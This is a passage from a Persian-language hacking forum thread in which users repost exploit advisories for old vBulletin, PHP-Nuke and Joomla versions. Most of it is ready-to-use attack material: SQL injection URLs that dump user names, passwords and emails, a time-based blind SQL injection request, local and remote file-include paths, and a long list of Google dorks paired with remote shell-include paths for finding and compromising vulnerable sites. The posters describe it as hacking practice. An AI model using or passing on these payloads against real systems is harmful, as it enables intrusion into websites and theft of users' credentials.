2] Aodrulez : for inspiring me
3] www.OrchidSeven.com
4] www.isac.org.in

این آخری . اکه مردی دیدم میزارم . تشکر کنین خیلی بهتر . اینجوری من میفهمم که کارم دارم درست انجام میدم

منبع : ashiyane.org

Share this post


Link to post
Share on other sites

vBulletin Version 3.8.4 File Include Vulnerability

Security Reason

 


Arrow  Topic :      
vBulletin Version 3.8.4 File Include Vulnerability 

Arrow  WLB :     WLB-2010030006  (About) 
Arrow  SecurityAlert : None 
Arrow  Date :     2010-03-02 
Arrow  Credit          : EjRaMHaCKeR 
Arrow  Added by     : EjRaMHaCKeR 
Arrow  SecurityRisk : Low  Security Risk Low  (About) 
Arrow  Remote : Yes 
Arrow  Local     : No 
Arrow  Status   : Bogus 

Arrow  History :     [2010-03-02] Started 

Arrow  Affected software :      vBulletin Version 3.8.4 



Arrow  Text :   

======= 

################################## 
# Script: vBulletin Version 3.8.4 File Include Vulnerability 

#Language: $php$ 

#Author : $EjRaM-HaCKeR$ 

#My home : [ www.sec-center.com ] 

#Greetz to : [Dr.eXe ,moroccoHaCkEr, All My Friends 
# $ EgyptHaCkeR ] 

# mail : m2z@9.cn $ tsv@hotmail.com 
################################# 

############# ===[ Exploits ]=== ########### 
# 1- 
http//www.site.com/[path]/vbseo_sitemap/vbseo_sitemap_functions.php?=[LFI] 
# 2- 
http//www.site.com/[path]/includes/functions.php?$classfile=[shell].txt? 
######################## 




$EjRaM-HaCKeR$  

Share this post


Link to post
Share on other sites

PhP-Nuke user.php SQL Injection

 view source 
print? 
----------------------------Information------------------------------------------------ 
+Name : PhP-Nuke user.php SQL Injection 
+Autor : Easy Laster 
+Date   : 04.03.2010 
+Script  : PhP-Nuke 
+Download : its a old version http://phpnuke.org/ 
+Price : 12,00$ 
+Language :PHP 
+Discovered by Easy Laster 
+Security Group 4004-Security-Project 
+Greetz to Team-Internet ,Underground Agents 
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, 
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, 
N00bor,novaca!ne. 

--------------------------------------------------------------------------------------- 

___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _| 
 |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                             |___|                 |___|            


---------------------------------------------------------------------------------------- 
+Vulnerability : http://www.site.com/phpnuke/user.php?op=userinfo&uname= 
+Exploitable   : http://www.site.com/phpnuke/user.php?op=userinfo&uname='+union+select 
+1,2,version(),4,5,6,7,8,9,10,11,12,13--+ 
-----------------------------------------------------------------------------------------  
  		 	  		 		  		  		 		  		 		 			 				__________________

Share this post


Link to post
Share on other sites

Joomla com_products 'intCategoryId' Remote Sql Injection Vulnerability

============================================================================== 
Joomla com_about 'intCategoryId' Remote Sql Injection Vulnerability ///////// 
============================================================================== 

*************************************************************************** 
Dork = inurl:com_products "intCategoryId" 
########################################################################### 
===[ Exploit ]=== 

=> http://website/index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+jos_users&op=category_details 
or 
=> http://website/index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+mos_users&op=category_details  

Share this post


Link to post
Share on other sites
اینم سری اول


inurl:"com_admin"

administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell

inurl:index.php?option=com_simpleboard
/components/com_simpleboard/file_upload.php?sbp=shell

inurl:"com_hashcash"
/components/com_hashcash/server.php?mosConfig_absolute_path=shell

inurl:"com_htmlarea3_xtd-c"

/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell

inurl:"com_sitemap"
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell

inurl:"com_performs"
components/com_performs/performs.php?mosConfig_absolute_path=shell

inurl:"com_forum"
/components/com_forum/download.php?phpbb_root_path=

inurl:"com_pccookbook"
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell

inurl:index.php?option=com_extcalendar
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell

inurl:"minibb"
components/minibb/index.php?absolute_path=shell

inurl:"com_smf"
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=shell

inurl:"com_pollxt"
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell

inurl:"com_loudmounth"
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell

inurl:"com_videodb"
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shel l

inurl:index.php?option=com_pcchess
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell

inurl:"com_multibanners"
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=sh ell

inurl:"com_a6mambohelpdesk"
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shel l

inurl:"com_colophon"
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell

inurl:"com_mgm"
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell

inurl:"com_mambatstaff"
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell

inurl:"com_securityimages"
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell

/components/com_securityimages/lang.php?mosConfig_absolute_path=shell

inurl:"com_artlinks"
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell

inurl:"com_galleria"
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell

inurl:"com_akocomment"
/akocomments.php?mosConfig_absolute_path=shell

inurl:"com_cropimage"
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell

inurl:"com_kochsuite"
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell

inurl:"com_comprofiler"
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell

inurl:"com_zoom"
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell

/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell

inurl:"com_serverstat"
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=she ll

inurl:"com_fm"
components/com_fm/fm.install.php?lm_absolute_path=shell

inurl:com_mambelfish
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell

inurl:com_lmo
components/com_lmo/lmo.php?mosConfig_absolute_path=shell

inurl:com_linkdirectory
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell

inurl:com_mtree
components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=shell

inurl:com_jim
administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell

inurl:com_webring
administrator/components/com_webring/admin.webring.docs.php?component_dir=shell

inurl:com_remository
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=

inurl:com_babackup
administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell

inurl:com_lurm_constructor
administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell

inurl:com_mambowiki
components/com_mambowiki/ MamboLogin.php?IP=shell

inurl:com_a6mambocredits
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell

inurl:com_phpshop
administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=s hell

inurl:com_cpg
components/com_cpg/cpg.php?mosConfig_absolute_path=shell

inurl:com_moodle
components/com_moodle/moodle.php?mosConfig_absolute_path=shell

inurl:com_extended_registration
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=shell

inurl:com_mospray
components/com_mospray/scripts/admin.php?basedir=shell

inurl:com_bayesiannaivefilter
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell

inurl:com_uhp
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell

inurl:com_peoplebook
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell

inurl:com_mmp
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell

inurl:com_reporter
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell

inurl:com_madeira
/components/com_madeira/img.php?url=shell

inurl:com_jd-wiki
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell

inurl:com_bsq_sitestatsا
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
/com_bsq_sitestats/external/rssfeed.php?baseDir=she

این باگ ها مربوط به نسخه های قدیمی جوملا(mosconfig مربوط به جوملا 1 است و legacy جوملا 1.5) است.

لطفا در معرفی کردن نسخه ی دقیق جوملای مورد استفاده را نیز ذکر کنید.

لطفا منبع هر موضوع را نیز ذکر کنید.

Share this post


Link to post
Share on other sites

ارسال شده در (ویرایش شده)

این باگ ها مربوط به نسخه های قدیمی جوملا(mosconfig مربوط به جوملا 1 است و legacy جوملا 1.5) است.

لطفا در معرفی کردن نسخه ی دقیق جوملای مورد استفاده را نیز ذکر کنید.

لطفا منبع هر موضوع را نیز ذکر کنید.

سلام

من اول تایپیک گفتم( جدام نمیشه . درهم و برهمه ):21:

باگهای جوملا زیاد که خیلی هاش تو 25 جدید که خودم آزمایش کردم حل شده

من از ورژن 1 دارم میزارم تا .....

من هرچی بزارم چه خودم ساختم جه کپی کنم از سایت آشیانست چون معلم من در باره هک این سایت بسیار عالی

ویرایش شده در توسط spyman

Share this post


Link to post
Share on other sites

Joomla Component Teams Multiple Blind SQL Injection Vulnerabilities



Teams 1_1028_100809_1711 Joomla Component Multiple Blind SQL Injection
Vulnerabilities

Name Teams
Vendor http://www.joomlamo.com
Versions Affected 1_1028_100809_1711

Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-08-10

X. INDEX

I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX


I. ABOUT THE APPLICATION
________________________

Teams is a base application for entering leagues, teams,
players, uniforms, and games.


II. DESCRIPTION
_______________

Some parameters are not properly sanitised before being
used in SQL queries.


III. ANALYSIS
_____________

Summary:

A) Multiple Blind SQL Injection


A) Multiple Blind SQL Injection
_______________________________

Many parameters are not properly sanitised before being
used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.


IV. SAMPLE CODE
_______________

A) Multiple Blind SQL Injection

POST /index.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 205

FirstName=mario&LastName=rossi&Notes=sds&TeamNames[1]=on&UniformNumber[1]=1
&Active=Y&cid[]=&PlayerID=-1 OR
(SELECT(IF(0x41=0x41,BENCHMARK(99999999,NULL),NULL)))&option=com_teams&task
=save&controller=player


V. FIX
______

No fix.


Share this post


Link to post
Share on other sites

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری